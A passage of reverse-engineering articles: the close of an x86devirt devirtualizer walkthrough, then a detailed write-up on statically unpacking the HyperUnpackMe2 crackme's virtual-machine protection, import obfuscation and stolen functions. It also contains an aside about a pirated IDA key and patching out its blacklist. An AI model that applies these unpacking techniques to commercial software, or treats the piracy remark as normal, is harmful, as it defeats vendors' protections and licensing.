                            extra_constraints=[state.regs.eax & controlFlowBits == con & controlFlowBits])):
                        satisfiedNotsRemaining -= 1;

            if(satisfiedMustsRemaining <= 0 and satisfiedNotsRemaining <= 0):
                if(not jumpMappings.has_key(key)):
                    jumpMappings[key] = []

                jumpMappings[key].append(jmp)

    finalMap = {}
    for key, val in jumpMappings.iteritems():
        maxPriority = 0;
        jmpName = "NOE FOUND"
        for j in val:
            if(j["priority"] > maxPriority):
                maxPriority = j["priority"]
                jmpName = j["name"]
        finalMap[jmpName] = key
        print("Mapped " + str(key) + " to " + jmpName)

    proj.terminate_execution()
    return finalMap

For each possible x86virt jump type, we test against each candidate x86 jump type to see if the x86 jump’s «not» and «must» sets can be satisfied accordingly by the restrictions on the EFLAGS registers in each state. If all «not»s and «must»s are satisfied, then the x86 jump is added as a possible candidate for that jump type.

Later, we iterate through all candidate x86 jumps for each jump type and choose the one with the highest priority to be mapped to it.

Finding the Signatures in the Protected Binary & Dumping Required Data

Finally, on to the last module needed to devirtualize code. x86devirt.py is the x64dbgpy Python plugin that instructs x64dbg on how to devirtualize the target.

x86devirt uses YARA rules to locate sections of code in the protected application, including the VM Stub, the instruction handlers, etc… You can see these YARA rules in VmStub.yara, VmRef.yara and instructions.yara:

  1. VmStub.yara is the YARA signature of the Virtual Machine interpreter.
  2. VmRef.yara is the YARA signature to detect where the application passes control off to the interpreter to begin interpreting a section of x86virt bytecode.
  3. instructions.yara is a set of YARA signatures for the different x86 instruction handlers.

An important note with these signatures is that they must match the original VM Stub and the devirtualized code generated by x86devirt. For example, consider a target that has been virtualized using two VM layers. After the first layer has been devirtualized, there will be a new VM stub in plain x86 form (that is, the second layer of virtualization). These signatures need to detect that second layer. However, the second layer was assembled using a different environment than the first layer and thus we need to take care for some special x86 instruction encodings in our signature (some x86 instructions have more than one way of being encoded). For example, consider:

add eax, ebx ; Encoded as 03C3
add eax, ebx ; Encoded as 01D8

So, when developing our signatures, we need to keep in mind that NASM could choose either encoding. With YARA, I just masked out instructions like these. If you are ever developing a signature with these constraints, please look into this more. There are plenty of resources on this topic: https://www.strchr.com/machine_code_redundancy

When it comes to devirtualizing x86virt, we must perform the following:

  1. Locate all VM Stubs that are present in plain x86 form using the vmStub.yara YARA signature
  2. Extract the decryption routine from the VM Stub
  3. Locate all references to that VM Stub (i.e, all areas where the VM is invoked to begin virtualizing code)
  4. Through each reference, extract the address where the virtualized bytecode is, and where the original code was ripped from
  5. Emulate part of the VM Stub to locate all instruction handlers and their opcodes
  6. Apply the YARA signatures to identify which handler (and subsequently, opcode) maps to which instruction behaviour and produce the instruction / opcode mappings
  7. Locate the JXX instruction handler and dump the part of the handler responsible for testing whether, given the jump type and state of the EFLAGS, the jump is taken. This is passed to x86devirt_jmp.py to extract the jump mappings
  8. For each reference, dump the virtualized code around that references and, with the jmp mappings, instruction mappings and the decryption routine, feed it to the x86virt-disassembler to be disassembled
  9. Finally, run NASM on the disassembler output to produce a x86 binary blob that can be written into where the virtualized code was ripped from, therefore restoring the virtualized function to its original form
  10. Loop back and search for any newly unveiled VM stubs

This process, once completed, will leave the x64dbg debugger in a state that allows the application to be cleanly dumped without any need for the VM stub.

(https://github.com/JeremyWildsmith)

Defeating HyperUnpackMe2 With an IDA Processor Module

1.0 Introduction

This article is about breaking modern executable protectors. The target, a crackme known as HyperUnpackMe2, is modern in the sense that it does not follow the standard packer model of yesteryear wherein the contents of the executable in memory, minus the import information, are eventually restored to their original forms.

Modern protectors mutilate the original code section, use virtual machines operating upon polymorphic bytecode languages to slow reverse engineering, and take active measures to frustrate attempts to dump the process. Meanwhile, the complexity of the import protections and the amount of anti-debugging measures has steadily increased.

This article dissects such a protector and offers a static unpacker through the use of an IDA processor module and a custom plugin. The commented IDB files and the processor module source code are included. In addition, an appendix covers IDA processor module construction. In short, this article is an exercise in overkill.

NOTE: all code snippets beginning with «ROM:» come from the disassembled VM code; all other snippets come from the protected binary.

HyperUnpackMe2 is provided as an ancillary to this article and includes:

  • codeseg—lightly—commented.idb: IDB of Virtual Machine (VM)
  • dumped.exe: Statically unpacked executable
  • Notepad.idb: IDB of packed executable
  • processor_module_source.zip: Source code for IDA processor module
  • th.w32: IDA processor module

The processor module (th.w32) belongs in %IDADIR%\procs. It requires IDA 5.0, as do both of the IDBs. Although I own IDA 5.0, these IDBs are linked with the pirated 5.0 key. This is due to the fact that IDB files contain the majority of your personal keyfile. Hence, the IDBs will stop working under 5.1, unless you patch out the blacklist code (which is trivial). If you are a legitimate customer of IDA and would like IDBs for a later version, contact me under the information at the bottom of the article.

 1.1 Modern Protectors

Protectors of generations past mainly compress/encrypt the original contents of the executable’s sections; redirect the entrypoint to a new section that contains the decompression/decryption stub mixed in with anti-disassembly and anti-debugging techniques; strip the import information at protect-time and rebuild the import address tables at runtime; and finally transfer control back to the original entrypoint. In other words, while the sections’ contents are modified on disk, they are mostly (with the exception of the import information) restored to their original state before execution is transferred back to the original program. Although there are some protectors which are exceptions, this is the basic idiom.

To unpack such protectors, execution is traced back to the original entrypoint, the process is dumped to create a new executable, and the import information is rebuilt. ImpRec and a sufficiently patched debugger are all that is needed to unpack protectors of this variety.

Rather than having an unmolested image in memory, new protectors are applying transformations to the original code in an effort to thwart understanding it and to make dumping the executable more difficult. Examples include converting portions of the code into proprietary byte-code formats which are executed by an embedded interpreter (so-called virtualization, virtual machines or VMs) and copying portions of the code elsewhere in the process’ address space (so-called stolen bytes, stolen functions). These techniques are now mainstream in all areas of software protection, from crackmes and commercial packers to industrial-grade protections.

 1.2 Transformations Applied by HyperUnpackMe2 to the Original Code

HyperUnpackMe2 extensively modifies the original code, and the entirety of the packer code is executed in a virtual machine. The anti-debugging is heavy and some of it is novel.

By quickly examining the code at the beginning of the binary, we notice the following:

  • Direct inter-module API calls are replaced with int 3 / 5x NOP. It is not known a priori whether these are fixed up directly, or whether they actually require a trip through a SEH. This could be problematic: think about Armadillo. Thunks to APIs are similarly obfuscated. The relevant data in the original IIDs and IATs have been zeroed.
  • Instructions which reference imports without calling them directly, i.e.
        .text:01004462  mov     esi, ds:__imp__lstrcpyW@8 ; lstrcpyW(x,x)
    

    have been replaced with zeroes. However, the surrounding context remains the same:

        TheHyper:0103A44D    push    ebx
        TheHyper:0103A44E    mov     ebx, [esp+8]
        TheHyper:0103A452    push    esi
        TheHyper:0103A453    db 0,0,0,0,0,0
        TheHyper:0103A459    push    edi
        TheHyper:0103A45A    push    _szAnsiText
        TheHyper:0103A460    push    ebx
        TheHyper:0103A461    call    esi
    

    So clearly, the missing instructions must be re-inserted (in some form) into the code before it’ll execute properly. Perhaps this happens via a trip through the virtualizer, perhaps they’re patched directly, perhaps a SEH-triggering event is patched in. Without further analysis, we have no way of knowing.

  • Intra-module calls are replaced with call $+5. It seems likely that these references are directly fixed up prior to execution; this turns out not to be the case (the ‘directly’ part is false).
  • Long jump instructions have had their targets replaced with a zero dword.
        .text:010023CE E9 00 00 00 00    jmp     $+5
    

    Again, it’s unknown what sort of obfuscation is being applied here.

  • Functions have been stolen, with zeroes left behind in place of the original code. These functions have been deposited towards the end of the packer section.
        .text:01001C5B                   ; __stdcall SetTitle(x)
        .text:01001C5B 00                _SetTitle@4     db    0
        .text:01001C5C 00                                db    0
        .text:01001C5D 00                                db    0
        .text:01001C5E 00                                db    0
    

 

 2.0 Virtual Machines

Although VM assembly languages are often simple, VMs pose a challenge because they severely dilute the value of existing tools. Standard dynamic analysis with a debugger is possible, but very tedious because of the low ratio of signal to noise: one traces the same VM parsing / dispatching code over and over again. Static analysis is broken because each different VM has a different instruction encoding format (and this can be polymorphic). Patching the VM program requires a familiarity with the instruction set that must be gained through analysis of the VM parser. Basically, reverse engineering a VM with the common tools is like reverse engineering a scripted installer without a script decompiler: it’s repetitious, and the high-level details are obscured by the flood of low-level details.

 2.1 General Setup of VM Protections

The virtual machine needs an environment to execute in. This is generally implemented as a structure, hereinafter «the VM context structure». Each VM is different, but of the ones I’ve encountered thus far, each is based on the concept of a register architecture, and so the VM context structures typically consist of registers, flags, and various pointers (e.g. stack, maybe a heap of some sort, or a static data section).

Before the first instruction is executed, the VM context structure is allocated, and the registers and pointers are initialized, which usually involves allocating memory (perhaps on the host stack) for the VM stack.

After initialization, the archetypal VM enters into a loop which:

  • Decodes instructions at VM_context.EIP,
  • Performs the commands specified by the instruction, and then
  • Calculates the next EIP.

The process of execution usually involves examining the first byte of the instruction and determining which function/switch statement case to execute.

Eventually, the VM reaches some stop condition, and either exits or transfers control back to the native processor.

 3.0 Description of HyperUnpackMe2’s VM Harness

The HyperUnpackMe2 VM context structure contains sixteen dword registers, including ESP, which can each be accessed as a little-endian byte, word, or dword. There is an EIP register and an EFLAGS register as well. There is a pointer to the VM data (which is where EIP begins), and its length. The structure is zeroed upon creation. Its declaration follows. See the included x86 IDB for all of the gory details.

    struct TH_registers
    {
        unsigned long rESP;    unsigned long r1;    unsigned long r2;
        unsigned long r3;      unsigned long r4;    unsigned long r5;
        unsigned long r6;      unsigned long r7;    unsigned long r8;
        unsigned long r9;      unsigned long rA;    unsigned long rB;
        unsigned long rC;      unsigned long rD;    unsigned long rE;
        unsigned long rF;
    };
    
    struct TH_context
    {
        unsigned char *vm_data;
        unsigned long vm_data_len;
        unsigned char *EIP;
        unsigned long EFLAGS;
        TH_registers registers;
        TH_keyed_mem keyed_mem_array[502];
        unsigned long stack[0x9000/4];
    };

 

 3.1 Instruction Encoding

The HyperUnpackMe2 VM consists of 36 instructions, split up into five groups. Each group has a different instruction encoding format, with a few commonalities. The commands understood by the VM are the following (non-obvious ones will be explained in detail in subsequent sections):

  • Group One: Two-operand arithmetic instructions:
    • mov, add, sub, xor, and, or, imul, idiv, imod, ror, rol, shr, shl, cmp
  • Group Two: One-operand arithmetic and general instructions:
    • push, pop, inc, dec, not
  • Group Three: One-operand control flow instructions:
    • jmp, jz, jnz, jge, jg, jle, jl, vmcall, x86call
  • Group Four: Memory-related instructions:
    • valloc, vfree, halloc, hfree
  • Group Five: Miscellaneous instructions:
    • getefl, getmem, geteip, getesp, retd, stop

The VM itself is heavily based on the x86 architecture, as evident from the following snippets:

    TheHyper:0104A159 VM_set_flags_dword:
    TheHyper:0104A159                 cmp     [edi], esi
    TheHyper:0104A15B                 pushf
    TheHyper:0104A15C                 pop     [eax+VM_context_structure.EFLAGS]
    
    TheHyper:0104A316 VM_jz:
    TheHyper:0104A316                 push    [eax+VM_context_structure.EFLAGS]
    TheHyper:0104A319                 popf
    TheHyper:0104A31A                 jnz     short loc_104A31F
    TheHyper:0104A31C                 mov     [eax+VM_context_structure.EIP], edi
    TheHyper:0104A31F loc_104A31F:
    TheHyper:0104A31F                 jmp     short VM_dispatcher_13h_locret

The VM is using the host processor’s flags in a very literal fashion. Group one and two, and to some extent group three, instructions are implemented very thinly on top of existing x86 instructions, reflecting the fundamental similarity of this virtual processor to it.

 3.2 X86 <-> VM Crossover

The x86call instruction, depicted below, switches the host ESP with the VM ESP, and transfers control to the x86 code pointed to by EDI (what EDI is depends on the specifics of the instruction’s encoding). The result of the function call is placed in virtual register #A. We’ll find out later that this functionality is only ever used to call small functions associated with the protector, so we don’t have to worry about alternative calling conventions and the clobbering of EDX and EBP by the function.

The switching of the host ESP with the VM ESP signifies that parameters to x86 functions are pushed onto the VM stack in the same order and manner as they would be if the calls were being made natively.

    TheHyper:0104A36A    mov     esi, esp
    TheHyper:0104A36C    mov     edx, [eax+VM_context_structure.VM_registers.rESP]
    TheHyper:0104A36F    mov     esp, edx
    TheHyper:0104A371    call    edi
    TheHyper:0104A373    mov     edx, [ebp+arg_0]
    TheHyper:0104A376    mov     [edx+VM_context_structure.VM_registers.rA], eax
    TheHyper:0104A379    mov     esp, esi

The stop instruction in group five, depicted below, is suspicious and looks like it’s used to transfer control back to OEIP. EBP, the frame pointer, points to the saved frame pointer coming into the function, which is the first thing pushed after the return address of the caller. Therefore, [ebp+4] is the return address.

    TheHyper:0104A69F    cmp     cl, 0FFh
    TheHyper:0104A6A2    jnz     short go_on_parsing
    TheHyper:0104A6A4    popa
    TheHyper:0104A6A5    mov     eax, [ebp+var_4_VM_context_structure]
    TheHyper:0104A6A8    mov     eax, [eax+VM_context_structure.VM_registers.rA]
    TheHyper:0104A6AB    mov     [ebp+4], eax    ; [ebp+4] = return address
    TheHyper:0104A6AE    leave
    TheHyper:0104A6AF    retn    8

We thus expect that the packer will return to OEIP by using the stop instruction, with OEIP in virtual register #A.

 3.3 Memory Keying

The virtual machine also maintains an associative array of memory locations. Each block of memory that it tracks has a keying tag associated with it. There are native functions to add memory pointers with keys, retrieve a pointer by passing in its associated key, remove a pointer given its key, and update a pointer given a key and a new block of memory to point to. Not all of these functions are accessible through the instruction set; they seem to be for debugging purposes.

Some of the memory blocks contain non-obfuscated x86 code, some obfuscated, some contain VM code, and some contain data.

The internal data structure for a keyed memory entry looks like the following:

    struct TH_keyed_mem
    {
        unsigned char *ptr;
        unsigned long key;
    };

Analyzing the functions which manipulate this structure can be slightly confusing due to negative structure displacements:

    TheHyper:0104A3DC    mov     [esi], edx           ; key
    TheHyper:0104A3DE    mov     [esi-4], eax         ; ptr
    TheHyper:0104A3E1    add     dword ptr [esi-4], 8 ; ptr

3.3.1 Initializing the Associative Array

During initialization, the VM calls a function which scans the VM’s data looking for all occurrences of the dword ‘$$$$’. For each instance found, it treats the next dword as the key, and takes the address of the dword following that as the pointer.

    ['$$$$'][4-byte key]^[arbitrary data]  ^:  pointer

3.3.2 Using the Associative Array

In the instruction set, group four specifically, there are two pairs of instructions which add and remove memory blocks from the internal associative array. The first pair allocates memory with VirtualAlloc, and the second pair uses HeapAlloc. There is no protection in the VM against attempting to de-allocate a block which wasn’t allocated in the first place.

Group five contains an instruction, getmem, to fetch a memory block given a key. Group three, the control-flow transfer instructions, can take memory keys as arguments. In other words, jmp/jcc key will transfer control into the memory region pointed at by the key. In fact, the first instruction executed by the VM is of the form jmp key, and this is the primary form of control-flow transfer in the VM.

 4.0 Static Analysis of HyperUnpackMe2’s VM Code

Based on the analysis of the VM dispatching harness, I constructed an IDA processor module to examine the code inside of the VM — dead and natively. As such, the anti-debugging tricks are generally beyond the scope of this article, but a brief discussion can be found in appendix A. See appendix B for information about writing IDA processor modules.

Beyond the anti-debugging, there’s a lot of anti-dump protection in this packer. The main «tricks» all involve the redirection of certain aspects of normal code execution.

  • The stolen functions are copied into VirtualAlloc’ed memory.
  • The API calls and API-referencing instructions point to obfuscated stubs which eventually redirect to their intended targets, which are actually in copies of the referenced DLLs, not the originals. There are 73 kilobytes’ worth of obfuscated stubs in the packer section.
  • Relative jumps and calls travel through tiny stub functions in VirtualAlloc’ed memory onto their destinations.

Further, all API references are changed to relatively-addressed varieties instead of direct references, i.e. 0xE8 [displacement to import] (call import_address) instead of 0xFF 0x15 [IAT entry] (call dword ptr [IAT entry]).

The point is to make dumping as hard as possible by creating a rigid reliance on the exact layout of the process’ address space as it exists during that particular invocation (including the VirtualAlloc’ed memory regions and copied DLLs), and by removing any trace of the import table.

The following sections fill in the gaps (no pun intended) left in section 1.2 by describing precisely what happens under the covers of the VM. In the course of examination, we find that the fixups for each type take place in clusters, with similar code being used repeatedly to perform the same type of fixup. This turns out to be all of the information needed to break the protection, resulting in an automatic, static unpacker for any binary packed with it (of which there are no more — TheHyper informed me that the protector was lost due to a disk crash).

 4.1 Stolen Functions

The first thing we’ll need to deal with are the missing functions. As we can see in the following snippet, it turns out that the functions are copied into allocated memory, and a long jump into the relevant function in allocated memory is inserted at the site of the function in the original code section. It should be noted that the stolen functions are still subject to the modifications described in subsequent sections.

    .text:01001B9A    ; __stdcall UpdateStatusBar(x)
    .text:01001B9A    _UpdateStatusBar@4 db 0B7h dup(0)
    
    ROM:0103AFAA    mov     r0B, 1038A82h ; location of function in the VM section
    ROM:0103AFB2    mov     r06, 0B7h     ; notice this matches up with the
    ROM:0103AFBA    push    r06           ; size of the stolen function above
    ROM:0103AFBD    push    r0B
    ROM:0103AFC0    push    r0F           ; points to a block of allocated mem
    ROM:0103AFC3    x86call x86_memcpy
    ROM:0103AFC9    add     rESP, 0Ch
    ROM:0103AFD1    mov     r0B, 1001B9Ah ; address of UpdateStatusBar
    ROM:0103AFD9    mov     r0E, r0F
    ROM:0103AFDD    sub     r0E, r0B
    ROM:0103AFE1    sub     r0E, 5        ; r0E is the displacement of the jmp
    ROM:0103AFE9    add     r0F, r06      ; point after the copied function
    ROM:0103AFED    mov     [r0Bb], 0E9h  ; assemble a long jmp
    ROM:0103AFF2    inc     r0B
    ROM:0103AFF5    mov     [r0B], r0E    ; write the displacement for the jmp

Locating these copies is easy enough: references to x86_memcpy following the final memory key are the ones which copy the stolen functions into VirtualAlloc’ed memory. We can easily extract the source of the copy and the destination of the write and copy the function back into its original real estate within the binary.

While we’re on the subject, when fixups are made to functions which have been copied into allocated memory, they are made as a displacement against the beginning of that memory. I.e. we might see a fixup of a long jump made against address [displacement + 100h]. Thus, in order to know where in the original binary this long jump is, we need to retain information about where the functions in the original binary are situated in the allocated memory.

For example:

    Displacement   0h into allocated memory -> 1001B9Ah
    Displacement  B7h into allocated memory -> 1001EEFh
    Displacement 11Dh into allocated memory -> 100696Ah

Then, when we see one of these arbitrary displacements, we can map it to a location in the original binary by looking for the greatest lower bound in the set of displacements. I.e. for displacement C0h, this is +9h into the function with displacement B7h, and is therefore at the address 1001EEFh + 9h. Here’s an example:

    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h    ; where does this point?

 

 4.2 Long Jump Obfuscation

 

    .text:010019DF E9 00 00 00 00                    jmp     $+5

Here we see, in the x86 IDB, an example of the jmp obfuscation. What actually happens here, at runtime, is that a chunk of memory is allocated, and gets filled with what looks like API thunk functions. The jmps in the binary are patched to jmp into the allocated memory, which subsequently jmps to the correct location in the binary. The following VM code illustrates this:

    ROM:0104840F    valloc  195h, 6       ; allocate 0x195 bytes of vmem under the
    ROM:01048418    getmem  r0E, 6        ; tag 0x6
                    
    ROM:0104841E    mov     r0F, 10019DFh ; see above:  same address
    ROM:01048426    mov     r0D, r0F
    ROM:0104842A    add     r0D, 5        ; point after the jump
    ROM:01048432    mov     r09, r0E      ; point at the currently-assembling stub
    ROM:01048436    sub     r09, r0D      ; calculate the displacement for the jmp
    ROM:0104843A    inc     r0F           ; point to the 0 dword in e9 00000000
    ROM:0104843D    mov     [r0F], r09    ; insert reference to allocated memory
    ROM:01048441    mov     r0B, 1001AE1h ; this is the target of the jmp
    ROM:01048449    mov     r0C, r0E
    ROM:0104844D    add     r0C, 5        ; calculate address after allocated jmp
    ROM:01048455    sub     r0B, r0C      ; calculate displacement for jmp
    ROM:01048459    mov     [r0Eb], 0E9h  ; build jmp in VirtualAlloc'ed memory
    ROM:0104845E    inc     r0E
    ROM:01048461    mov     [r0E], r0B    ; insert address into jmp
    ROM:01048465    add     r0E, 4

This is the general code sequence used to fix up the jumps when the function to be fixed up remains in the original binary’s sections. When the function has been copied into memory, as described in the previous section, the code changes slightly: r0F and r0B’s addresses are the displacements described previously. For example, the code at -41E and -441 are replaced with these snippets, respectively:

    ROM:010498F3    getmem  r0F, 10000h
    ROM:010498F9    mov     r0F, [r0F]
    ROM:010498FD    add     r0F, 469h
    
    ROM:01049920    getmem  r0B, 10000h
    ROM:01049926    mov     r0B, [r0B]
    ROM:0104992A    add     r0B, 639h

Given the sequences above, and making use of the stolen address -> real address mapping, it’s trivial to cut out the middleman and insert the proper displacements into the correct dword locations. In the code above, we retrieve the dword operands from -41E and -441 and simply fix the jumps ourselves.

 4.3 Calls-To Obfuscation

These are handled in a very similar fashion as the jump obfuscation: the code to fix up the calls-to references is exactly the same as the jump obfuscation fixups. The calls also go through stubs in allocated memory which jmp to their proper destinations.

    .text:01001C51 6A 00             push    0
    .text:01001C53 E8 00 00 00 00    call    $+5
    .text:01001C58 C2 1C 00          retn    1Ch
    
    ROM:0104419A    valloc  3F2h, 5       ; allocate 0x3f2 bytes of memory under
    ROM:010441A3    getmem  r0E, 5        ; the tag 0x5
    
    ROM:010441A9    mov     r0F, 1001C53h ; address of call to be fixed up (above)
    ROM:010441B1    mov     r0D, r0F
    ROM:010441B5    add     r0D, 5        ; point after the call
    ROM:010441BD    mov     r09, r0E      ; r09 points to the allocated jmp stub
    ROM:010441C1    sub     r09, r0D
    ROM:010441C5    inc     r0F
    ROM:010441C8    mov     [r0F], r09    ; insert the proper displacement
    ROM:010441CC    mov     r0B, 1001B9Ah ; we would be calling this address
    ROM:010441D4    mov     r0C, r0E
    ROM:010441D8    add     r0C, 5
    ROM:010441E0    sub     r0B, r0C      ; calculate displacement
    ROM:010441E4    mov     [r0Eb], 0E9h  ; form the long jmp in allocated memory
    ROM:010441E9    inc     r0E
    ROM:010441EC    mov     [r0E], r0B
    ROM:010441F0    add     r0E, 4

Notice that, in this case, a call from a non-stolen function is being fixed up to call a non-stolen function: the addresses on lines -1A9 and -1CC are hard-coded within the binary. When a call in a stolen function is fixed up to call another function, the beginning of the above code sequence is different: it uses the getmem idiom, as we saw previously. The code at -1A9 becomes:

    ROM:010441F8    getmem  r0F, 10000h
    ROM:010441FE    mov     r0F, [r0F]
    ROM:01044202    add     r0F, 20Dh

However, the destination address is not loaded via getmem, because as we saw previously, calls to stolen functions are routed to their destinations via these jumps. I.e. calls to stolen functions behave just like calls to the original functions.

Recovering the proper displacement from the caller to the callee is as simple as it was for the jumps, because the code is identical, so see the closing remarks for the last section on how to fix up these calls.

 4.4 Import Obfuscation

Here’s a sample of the import redirection. Instead of referencing the imports directly, the jmp/call-to-import instructions are patched to reference locations such as these:

    TheHyper:01021524    pushf
    TheHyper:01021525    pusha
    TheHyper:01021526    call    sub_1021548
    
    TheHyper:01021548    pop     eax
    TheHyper:01021549    add     eax, 16h
    TheHyper:0102154C    jmp     eax

This sort of thing goes on for a while (six layers for this one) with some random junked garbage interspersed before eventually redirecting control to the original import:

    TheHyper:010215DE 61                popa
    TheHyper:010215DF 9D                popf
    TheHyper:010215E0 E9 00 00 00 00    jmp     $+5

4.4.1 IAT Reconstruction

Believe it or not, the first thing that HyperUnpackMe2 does when it really gets down to business is to correctly rebuild the original IAT.

First, the DLL names are retrieved from memory byte-by-byte. The names are not stored contiguously, but rather, the bytes corresponding to the DLL names are randomly mixed together. The DLL is then LoadLibraryA’d.

    ROM:01026058    mov     r04, 1013000h  ; point to beginning of packer section
    ROM:0102607B    getmem  r05, dword_101382D
    ROM:01026081    mov     r0B, r09
    ROM:01026085    mov     r06, r04
    ROM:01026089    add     r06, 41Ch
    ROM:01026091    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x101341c
    ROM:01026095    inc     r0B
    ROM:01026098    mov     r06, r04
    ROM:0102609C    add     r06, 93h
    ROM:010260A4    mov     [r0Bb], [r06b] ; copy byte of DLL name from 0x1013093
    
    ; idiom repeats a variable number of times
    
    ROM:010260A8    inc     r0B
    ROM:0102617C    mov     [r0Bb], 0
    ROM:01026181    push    r09
    ROM:01026184    x86call r0C                 ; LoadLibraryA
    ROM:01026186    add     rESP, 4

Next, the entire DLL’s address space is copied into a freshly-allocated chunk of memory. Yes, you read that right. The DLL’s SizeOfImage is used as the size parameter to VirtualAlloc, and then the entire DLL is memcpy’d into it the result. This is responsible for a huge bloat in the memory footprint. I didn’t think that this trick would work, but the crackme does run, after all. Personal correspondence with TheHyper reveals that this is why the crackme only runs on XP SP2 (although I haven’t investigated why — help me out here, Alex?).

The following code illustrates the process:

    ROM:0102618E    push    r09
    ROM:01026191    push    r0B
    ROM:01026194    push    r0D
    ROM:01026197    mov     r09, r0A
    ROM:0102619B    getmem  r0A, g_Copy_Of_Kernel32_Address_Space
    ROM:010261A1    mov     r0A, [r0A]
    ROM:010261A5    push    kernel32_hashes_VirtualAlloc
    ROM:010261AB    push    r0A
    ROM:010261AE    vmcall  API__GetProcAddress
    ROM:010261B4    mov     r0D, r0A
    ROM:010261B8    mov     r0B, r09
    ROM:010261BC    add     r0B, 3Ch
    ROM:010261C4    mov     r0B, [r0B]
    ROM:010261C8    add     r0B, r09
    ROM:010261CC    add     r0B, 50h
    ROM:010261D4    mov     r0B, [r0B]          ; retrieve this DLL's SizeOfImage
    ROM:010261D8    push    40h
    ROM:010261DE    push    1000h
    ROM:010261E4    push    r0B
    ROM:010261E7    push    0
    ROM:010261ED    x86call r0D                 ; allocate that much memory
    ROM:010261EF    add     rESP, 10h
    ROM:010261F7    mov     r03, r0A
    ROM:010261FB    mov     [r05], r0A
    ROM:010261FF    push    r0B
    ROM:01026202    push    r09
    ROM:01026205    push    r0A
    ROM:01026208    x86call x86_memcpy          ; copy DLL's address space
    ROM:0102620E    add     rESP, 0Ch
    ROM:01026216    pop     r0D
    ROM:01026219    pop     r0B
    ROM:0102621C    pop     r09

Next, the imported APIs are loaded, but not in the normal way. The protector includes a VM-function that I’ve called API__GetProcAddress, which takes a pseudo-HMODULE and a shellcode-like API hash as arguments. The pseudo-HMODULE is the address of the memory that the DLL was copied into above. Thus, the addresses returned by this function reside in the copied DLL bodies, and not the originals.

API__GetProcAddress works by iterating through the DLL’s exports and hashing each function’s name, stopping when it finds the corresponding hash that was passed in as an argument. It then returns the address of that function.

This makes it harder for dynamic tools to identify which APIs are actually being used: after all, the API addresses are not contained within a loaded module.

The hashes and their locations in the original IAT are retrieved from the jumble of data at the beginning of the packer section in a similar fashion as the assembling of the DLL names. Additionally, the address at which the resolved import belongs in the original IAT entries is also assembled from scattered data.

    ROM:0102621F    xor     r07, r07    ; r07 = hash
    ROM:01026223    mov     r06, r04
    ROM:01026227    add     r06, 12h
    ROM:0102622F    mov     r05, [r06]
    ROM:01026233    and     r05, 0FFh
    ROM:0102623B    or      r07, r05    ; get a single byte of the hash
    ROM:0102623F    ror     r07, 8
    
    ; idiom repeats three times
    
    ROM:010262B3    xor     r08, r08    ; r08 = where to put the resolved import
    ROM:010262B7    mov     r06, r04
    ROM:010262BB    add     r06, 5C7h
    ROM:010262C3    mov     r05, [r06]
    ROM:010262C7    and     r05, 0FFh
    ROM:010262CF    or      r08, r05
    ROM:010262D3    ror     r08, 8
    
    ; idiom repeats three times
    
    ROM:01026347    push    r07
    ROM:0102634A    push    r03         ; point at copied DLL
    ROM:0102634D    vmcall  API__GetProcAddress
    ROM:01026353    add     r08, 1000000h
    ROM:0102635B    mov     [r08], r0A  ; store resolved address back into IAT

The DLL names, hashes, and IAT addresses can all be recovered with no difficulties, and we can ignore the DLLs being copied into dynamically allocated memory. It’s a simple matter to reverse the hashes into API names. Therefore, the entirety of the import information can be reconstructed statically: we can simply mimic what the packer itself does, rebuild the IDTs/IATs with no difficulties, and then point the imports directory pointer in the PE header to our rebuilt structures.

I was anticipating things would be harder than they turned out to be, so I decided to move the FirstThunk lists (into which the original import references were made) instead of keeping them at their original addresses. This turned out to be an unnecessary mistake that complicates some of what follows. I apologize.

In order to rectify this situation, I kept a map from the old IAT addresses into the new IATs that I created.

For example:

    .text:010012A0    __imp__PageSetupDlgW@4 dd 0

    010012A0 -> [Address of new FirstThunk entry for PageSetupDlgW import]

4.4.2 IAT Redirection

The next thing that happens is that the addresses which were resolved in the previous section are inserted into API-obfuscating stubs described in 4.4, and the addresses of these API-obfuscating stub functions are inserted into the IAT atop the import addresses.

    .text:010012A0    ; BOOL __stdcall PageSetupDlgW(LPPAGESETUPDLGW)
    .text:010012A0    __imp__PageSetupDlgW@4 dd 0
    
    TheHyper:01014126    pushf              
    TheHyper:01014127    pusha              
    TheHyper:01014128    call    sub_1014150 ; eventually ends up at next snippet
                                                                           
    TheHyper:0101423A    popa                       
    TheHyper:0101423B    popf                       
    TheHyper:0101423C    jmp     near ptr 0B97002DDh ; patch here + 1 byte
    
    ROM:0103659A    mov     r0B, 10012A0h ; see above:  IAT addr
    ROM:010365A2    mov     r0E, 1014126h ; see above:  beginning of import obfs
    ROM:010365AA    mov     r08, 101423Dh ; see above:  end of import obfs
    ROM:010365B2    mov     r06, [r0B]
    ROM:010365B6    mov     [r0B], r0E    ; replace IAT addr with obfuscated addr
    ROM:010365BA    mov     r03, r08
    ROM:010365BE    dec     r03
    ROM:010365C1    add     r03, 5
    ROM:010365C9    sub     r06, r03
    ROM:010365CD    mov     [r08], r06    ; form relative jump to real import

This makes no difference to the static examiner, and does not require fixups.

4.4.3 Call Instruction Fixup

Next, the CALL instructions which reference the IAT are re-created as relatively-addressed instructions which reference the API-obfuscating stub functions. The instructions in the original binary were 0xFF 0x15 [direct address], the pre-fixup instructions are 0xCC 0x90 0x90 0x90 0x90 0x90, and the new instructions are 0xE8 [relative address] 0x90. As this operation requires one less byte than the original directly-addressed references, a NOP is needed for the remaining byte cavity.

    .text:010019D4    int     3    ; Trap to Debugger
    .text:010019D5    nop
    .text:010019D6    nop
    .text:010019D7    nop
    .text:010019D8    nop
    .text:010019D9    nop
    
    ROM:0103C747    mov     r03, 10019D4h ; address of the snippet above
    ROM:0103C74F    mov     r06, r03
    ROM:0103C753    add     r06, 5        ; point after call
    ROM:0103C75B    mov     [r03b], 0E8h  ; insert relative call
    ROM:0103C760    inc     r03
    ROM:0103C763    mov     r04, 100121Ch ; where we call to
    ROM:0103C76B    sub     r04, r06      ; create relative displacement
    ROM:0103C76F    mov     [r03], r04    ; insert relative address
    ROM:0103C773    add     r03, 4
    ROM:0103C77B    mov     [r03b], 90h   ; insert NOP in empty byte spot

As before, the idiom is slightly different for fixing the calls in stolen functions, in that r03 is fetched from memory instead of referenced directly. The code at -747 would become, for instance:

    ROM:0103C67E    getmem  r03, 10000h
    ROM:0103C684    mov     r03, [r03]
    ROM:0103C688    add     r03, 1318h

